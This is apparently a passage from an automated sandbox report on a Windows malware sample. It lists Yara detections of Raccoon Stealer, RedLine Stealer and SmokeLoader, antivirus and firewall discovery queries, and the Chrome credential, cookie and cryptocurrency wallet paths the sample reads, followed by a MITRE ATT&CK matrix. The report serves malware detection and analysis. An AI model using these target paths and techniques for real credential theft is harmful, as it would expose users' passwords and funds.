Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: Process Memory Space: A329.exe PID: 4468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: A329.exe PID: 5404, type: MEMORYSTR

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 0000001A.00000003.334812950.00000000012F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AD1D.exe PID: 5156, type: MEMORYSTR

Yara detected RedLine Stealer

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000013.00000002.303424568.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.247979321.0000000001F51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.247967677.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.303450703.0000000000491000.00000004.00000001.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: Process Memory Space: A329.exe PID: 4468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: A329.exe PID: 5404, type: MEMORYSTR

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 0000001A.00000003.334812950.00000000012F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AD1D.exe PID: 5156, type: MEMORYSTR

Yara detected RedLine Stealer

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000013.00000002.303424568.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.247979321.0000000001F51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.247967677.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.303450703.0000000000491000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	Startup Items1	Startup Items1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer34	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	Input Capture1	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Application Shimming1	Application Shimming1	Scripting1	Security Account Manager	System Information Discovery145	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Standard Port11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution1	Registry Run Keys / Startup Folder12	Process Injection512	Obfuscated Files or Information3	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder12	Software Packing14	LSA Secrets	Security Software Discovery1061	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol124	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	Process Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Virtualization/Sandbox Evasion651	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading11	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion651	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection512	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Hidden Files and Directories1	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report IuXJUPoEo6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Threatname: Raccoon Stealer

Yara Overview

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails